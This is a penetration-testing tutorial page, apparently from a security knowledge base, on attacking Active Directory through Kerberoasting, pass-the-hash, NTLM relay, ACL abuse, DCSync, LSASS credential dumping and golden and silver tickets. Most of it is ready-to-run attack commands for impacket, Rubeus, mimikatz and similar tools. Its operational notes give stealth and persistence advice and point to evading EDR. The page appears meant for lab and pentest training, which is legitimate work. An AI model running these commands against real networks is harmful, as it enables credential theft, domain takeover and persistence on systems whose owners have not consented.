Active Directory

Active Directory Exploitation

Kerberoasting, Pass-the-Hash, DCSync, and the path to Domain Admin

22 min readUpdated 2026-04-18
#kerberoasting#pass-the-hash#dcsync#mimikatz#golden-ticket#ad
TL;DR
  • Kerberoasting requests service tickets and cracks them offline — no elevated privileges needed
  • Pass-the-Hash uses captured NTLM hashes to authenticate without knowing the plaintext password
  • DCSync mimics a domain controller to pull all password hashes from the DC — requires DA privileges
  • Golden Tickets forge TGTs using the krbtgt hash — persistence that survives password changes
  • The attack path is rarely one exploit — it's a chain: low user > service account > constrained delegation > Domain Admin

Prerequisites

  • Completed: Active Directory Enumeration (you need the map before you attack)
  • Valid domain user credentials
  • BloodHound data showing attack paths

Lab: HackTheBox — Forest (AS-REP Roasting), Active (Kerberoasting), Resolute (DNS admin > DA), Return (LDAP credential leak). These four machines cover the most common AD attack chains.

Kerberoasting

Any domain user can request a Kerberos service ticket for any account with an SPN. The ticket is encrypted with the service account's password hash. You crack it offline — zero interaction with the service account required.

step 1Find SPNsimpacketGetUserSPNs / ldap query
step 2Request ticketsKRB_TGS_REQ to KDC
step 3Extract hashes$krb5tgs$23$...
step 4Crack offlinehashcathashcat -m 13100
step 5AuthenticateUse cracked password
bash
# Kerberoast from Linux
impacket-GetUserSPNs corp.local/user:password -dc-ip DC_IP -request

# Save hashes to file
impacket-GetUserSPNs corp.local/user:password -dc-ip DC_IP -request -outputfile hashes.txt

# Crack RC4 (etype 23) tickets
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt

# AES (etype 17/18) tickets — harder to crack, less common
hashcat -m 19600 hashes.txt /usr/share/wordlists/rockyou.txt   # etype 17
hashcat -m 19700 hashes.txt /usr/share/wordlists/rockyou.txt   # etype 18
powershell
# Kerberoast from Windows
# Rubeus — the go-to tool for Kerberos attacks
.\Rubeus.exe kerberoast /outfile:hashes.txt

# Target a specific user
.\Rubeus.exe kerberoast /user:svc_sql /outfile:hashes.txt

# Only request RC4 tickets (easier to crack)
.\Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
Prioritise High-Privilege SPNs

Service accounts with SPNs that are also members of Domain Admins or have DA-equivalent privileges are your primary targets. BloodHound's "Kerberoastable users with high value targets" query finds these instantly.

AS-REP Roasting

Accounts with "Do not require Kerberos preauthentication" enabled respond to an AS-REQ without requiring a valid timestamp encrypted with the user's key. The AS-REP contains a portion encrypted with the user's hash — you crack it offline.

bash
# Find and roast in one step (Linux)
impacket-GetNPUsers corp.local/ -dc-ip DC_IP -no-pass -usersfile users.txt

# Authenticated — find targets automatically
impacket-GetNPUsers corp.local/user:password -dc-ip DC_IP -request

# Crack
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
powershell
.\Rubeus.exe asreproast /outfile:asrep.txt
.\Rubeus.exe asreproast /user:targetuser /outfile:asrep.txt

Pass-the-Hash (PtH)

Windows NTLM authentication doesn't require the plaintext password — it requires the NT hash. If you capture a user's NTLM hash, you can authenticate as them directly.

bash
# Pass-the-Hash with various tools
# CrackMapExec — check if hash authenticates across the network
crackmapexec smb 192.168.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c'

# Impacket tools — pass hash to get a shell
impacket-psexec corp.local/Administrator@DC_IP -hashes ':8846f7eaee8fb117ad06bdd830b7586c'
impacket-wmiexec corp.local/Administrator@DC_IP -hashes ':8846f7eaee8fb117ad06bdd830b7586c'
impacket-smbexec corp.local/Administrator@DC_IP -hashes ':8846f7eaee8fb117ad06bdd830b7586c'

# Evil-WinRM — WinRM/PS remoting with hash
evil-winrm -i DC_IP -u Administrator -H '8846f7eaee8fb117ad06bdd830b7586c'
LM vs NT Hash

The full NTLM hash is LM_hash:NT_hash. LM hashes are legacy and usually disabled — they appear as aad3b435b51404eeaad3b435b51404ee when absent. For PtH, only the NT hash (right side of the colon) matters.

Pass-the-Ticket (PtT)

Kerberos tickets (TGTs and service tickets) can be stolen from memory and used on other machines or passed to tools.

powershell
# Dump Kerberos tickets from memory
.\Rubeus.exe dump /nowrap              # All tickets
.\Rubeus.exe dump /user:Administrator /nowrap  # Specific user

# Import a stolen ticket
.\Rubeus.exe ptt /ticket:base64encodedticket

# Verify it worked
klist                                  # Show current tickets
bash
# From Linux
impacket-ticketConverter ticket.ccache ticket.kirbi   # Convert format
export KRB5CCNAME=/path/to/ticket.ccache              # Use ticket
impacket-psexec -k -no-pass corp.local/Administrator@DC_IP

NTLM Relay Attacks

If NTLM authentication can be captured over the network, it can be relayed to another target without cracking.

bash
# Step 1: Check which targets have SMB signing disabled (required for relay)
crackmapexec smb 192.168.1.0/24 --gen-relay-list targets.txt

# Step 2: Set up ntlmrelayx targeting those hosts
impacket-ntlmrelayx -tf targets.txt -smb2support

# Step 3: Trigger authentication (Responder poisons LLMNR/NBT-NS)
responder -I eth0 -rdwv

# With ntlmrelayx in socks mode (interactive relay)
impacket-ntlmrelayx -tf targets.txt -smb2support -socks
# Then use proxychains with impacket tools through the relay
SMB Signing

SMB signing cryptographically signs each SMB packet. If signing is required AND enforced, relay attacks against that target are impossible. Modern Windows Server configurations enforce signing. Workstations typically don't.

ACL Abuse — Privilege Escalation via Misconfigurations

BloodHound finds ACL attack paths. Here's how to exploit the common ones.

GenericAll on a User — Reset Their Password

powershell
# You have GenericAll on targetuser
$SecPassword = ConvertTo-SecureString 'NewPassword123!' -AsPlainText -Force
Set-ADAccountPassword -Identity targetuser -NewPassword $SecPassword -Reset

GenericAll on a Group — Add Yourself

powershell
# You have GenericAll on "Domain Admins"
Add-ADGroupMember -Identity "Domain Admins" -Members youruser

WriteDACL — Grant Yourself GenericAll

powershell
# You have WriteDACL on targetuser — grant yourself GenericAll
$victim = "targetuser"
$attacker = "youruser"

# Using PowerView
Add-DomainObjectAcl -TargetIdentity $victim -PrincipalIdentity $attacker -Rights All

GenericWrite > Shadow Credentials Attack

bash
# You have GenericWrite on a target account
# Add a shadow credential (certificate) for that account
pywhisker -d corp.local -u attacker -p 'password' --target targetuser --action add

# Then get a TGT using the certificate
python3 gettgtpkinit.py -cert-pfx cert.pfx -pfx-pass pass corp.local/targetuser tgt.ccache
export KRB5CCNAME=tgt.ccache
impacket-psexec -k -no-pass corp.local/targetuser@DC_IP

Constrained Delegation Abuse

If a computer or service account has constrained delegation configured, it can obtain service tickets on behalf of any user to a specific set of services.

bash
# Find accounts with constrained delegation
impacket-findDelegation corp.local/user:password -dc-ip DC_IP

# If you have the account's hash — request a ticket as Domain Admin
impacket-getST corp.local/svc_account -hashes ':NThash' -spn cifs/DC.corp.local -impersonate Administrator -dc-ip DC_IP

# Use the ticket
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-pass corp.local/Administrator@DC.corp.local

DCSync — Pulling All Hashes

DCSync mimics a Domain Controller's replication request. With DS-Replication-Get-Changes-All rights (or Domain Admin), you can extract every user's hash from any DC — remotely, without touching disk.

bash
# DCSync from Linux (requires DA or explicit replication rights)
impacket-secretsdump corp.local/Administrator:password@DC_IP

# DCSync specific user
impacket-secretsdump -just-dc-user krbtgt corp.local/Administrator:password@DC_IP

# DCSync all users with hash
impacket-secretsdump corp.local/Administrator:password@DC_IP -just-dc-ntlm
powershell
# From Windows with Mimikatz
mimikatz # lsadump::dcsync /domain:corp.local /user:krbtgt
mimikatz # lsadump::dcsync /domain:corp.local /all /csv
The krbtgt Account

Always dump the krbtgt hash. It's used to sign all Kerberos tickets. With this hash, you can forge Golden Tickets — unlimited domain access that survives DA password changes.

LSASS Credential Dumping

LSASS (Local Security Authority Subsystem Service) stores credentials of logged-in users in memory — plaintext passwords, NTLM hashes, and Kerberos tickets.

powershell
# Mimikatz — the classic
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords    # Dump all credentials from LSASS
mimikatz # sekurlsa::tickets           # Dump all Kerberos tickets
mimikatz # sekurlsa::wdigest           # Cleartext passwords (if WDigest enabled)

# Dump LSASS memory for offline analysis (less noisy)
# Method 1: Task Manager (manual, requires GUI)
# Method 2: ProcDump (Sysinternals — signed, less detected)
procdump.exe -ma lsass.exe lsass.dmp

# Method 3: comsvcs.dll (built-in)
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id lsass.dmp full

# Analyse dump offline
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords
LSASS Protected

Windows Credential Guard virtualises LSASS in a separate VM. Even with SYSTEM, you can't read credentials this way when it's enabled. Check: Get-ComputerInfo -Property DeviceGuardSecurityServicesRunning.

Golden Ticket — Unlimited Domain Persistence

With the krbtgt hash, you can forge a TGT (Ticket Granting Ticket) for any user, with any group memberships, valid for any duration. This is the golden ticket attack.

powershell
# Requires: domain SID, krbtgt NT hash, target username
mimikatz # kerberos::golden /user:Administrator /domain:corp.local \
  /sid:S-1-5-21-xxxx /krbtgt:NTLM_HASH_HERE /ticket:golden.kirbi

# Load the ticket
mimikatz # kerberos::ptt golden.kirbi

# Verify
klist
dir \\DC\C$
bash
# From Linux
impacket-ticketer -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain corp.local Administrator
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-pass corp.local/Administrator@DC.corp.local
Golden Ticket Detection

Golden tickets with abnormal PAC data, lifetimes > 10 hours, or for users that don't exist are detectable. Modern EDR solutions flag them. The "Privileged Access Workstation" (PAW) model limits the damage by isolating DA sessions.

Silver Ticket

Silver tickets forge service tickets (TGS) using the service account's hash — not krbtgt. More targeted and harder to detect, but limited to specific services.

powershell
# CIFS service on a specific server
mimikatz # kerberos::golden /user:Administrator /domain:corp.local \
  /sid:S-1-5-21-xxx /target:fileserver.corp.local /service:cifs \
  /rc4:SERVICE_ACCOUNT_NTLM_HASH /ticket:silver.kirbi

Operational Notes

  • Start with Kerberoasting — it's the lowest-risk attack. Offline cracking means no interaction with the target after the initial ticket request.
  • Avoid secretsdump in production — it creates a detectable network replication event. Use it once, dump everything in one go.
  • krbtgt password changes — changing the krbtgt password twice invalidates all existing Kerberos tickets (including golden tickets). Once is not enough — it has two password history slots.
  • New Admin vs builtins — avoid using the built-in Administrator account after escalation. Create your own account or use a service account for persistence — built-in accounts are heavily monitored.
  • Lateral movement tool choicepsexec writes a service to disk, very noisy. wmiexec uses WMI — no service, less noisy. evil-winrm uses WinRM — requires port 5985 open.

What to Read Next

  • Post-Exploitation — what to do once you have Domain Admin: dump NTDS.dit, establish persistence, pivot to cloud
  • Evasion & AV Bypass — Mimikatz and other AD tools are flagged by every EDR — learn to run them without detection
  • Forensics — understand what evidence AD attacks leave behind from the defender's perspective
← PreviousActive Directory EnumerationNext →Wireless Attacks
← back to knowledge base